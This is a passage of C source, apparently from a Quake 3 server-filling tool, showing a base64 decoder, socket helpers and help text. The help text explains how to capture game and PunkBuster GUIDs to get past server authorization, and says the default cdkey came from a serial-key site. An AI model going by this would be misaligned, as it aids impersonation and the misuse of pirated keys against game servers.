    limit = data + len;
    for(;;) {
#define B64NEXT do {            /* auto chars cleaning */   \
                    c = *data;                              \
                    if((data == limit) || (c == '=')) {     \
                        c = 0;                              \
                        break;                              \
                    }                                       \
                    data++;                                 \
                } while(c && ((c <= ' ') || (c > 0x7f)));   \
                if(!c) break;

        B64NEXT;
        a = base[c];

        B64NEXT;
        b = base[c];
        *p++ = (a << 2)        | (b >> 4);

        B64NEXT;
        a = base[c];
        *p++ = ((b & 15) << 4) | (a >> 2);

        B64NEXT;
        *p++ = ((a & 3) << 6)  | base[c];

#undef B64NEXT
    }
    *p = 0;

    len = p - buff;
    if(size) *size = len;
    if((len + 1) != xlen) {             // save memory
        buff = realloc(buff, len + 1);  // NULL included!
        if(!buff) return(NULL);
    }
    return(buff);
}



void pbhelp(void) {
    fputs(
        "-B G P   support for \"Enemy Territory 2.60 + PB\" servers\n"
        "         you must specify the game's CL_GUID and the PB_GUID you want to use.\n"
        "         these parameters are visible in the \"connect\" packet sent from your\n"
        "         real game client to a server and are based on the content of the file\n"
        "         etkey available in the game folder.\n"
        "         When you connect to a server your client authenticates on the auth\n"
        "         server, so try to use this -B option after having connected to a host\n"
        "         with your real client (or you will receive an error message or none).\n"
        "         Knowing your GUIDs is extremely simple:\n"
        "         - download the \"Quake 3 engine testing server\" tool:\n"
        "           http://aluigi.org/testz/q3ts.zip\n"
        "         - double-click on the q3ts executable, it will be launched immediately\n"
        "         - open your ET 2.60 client (with Punkbuster enabled, pb_cl_enable)\n"
        "         - from the console type \"connect localhost\" or connect to localhost\n"
        "           or 127.0.0.1 through the usual \"Play Online -> Connect to IP\"\n"
        "         - in the window of the testing server tool you will see the plain-text\n"
        "           \"connect\" packet with all the needed fields (cl_guid\\G and *P)\n"
        "         Sorry, but I don't have time and desire to make something better\n"
        "\n", stdout);
    exit(1);
}



void authhelp(void) {
    printf("\n"
        "Authorization options for some Internet'servers (mainly Quake 3 only):\n"
        "-i       Enable authorization. It sends the cdkey to the authorization server\n"
        "         so you can use this tool also versus SOME online servers that require\n"
        "         authorization\n"
        "-I       authorization only: practically it does the authorization request and\n"
        "         then exits, in fact is not needed to do authorization everytime but\n"
        "         only when needed. The usage of this option is better than -i\n"
        "         Example: q3fill -I -k mykey\n"
        "-a S:[P] specify the authorization server to use. Default is\n"
        "         %s:%hu that is the Quake 3's authorization\n"
        "         server (%hu is the default port)\n"
        "         This option is NEEDED if you want to try to test other games\n"
        "-k KEY   specify a valid online cdkey. The default key that will be used is\n"
        "         for Quake 3 only and is \""CDKEYDEF"\" (found on a serialz site)\n"
        "         Usually the cdkeys must not include the '-' chars\n"
        "\n", AUTHSERVER, AUTHPORT, AUTHPORT);
    exit(1);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fdr;
    int     err;

    tout.tv_sec  = 2;
    tout.tv_usec = 0;
    FD_ZERO(&fdr);
    FD_SET(sock, &fdr);
    err = select(sock + 1, &fdr, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


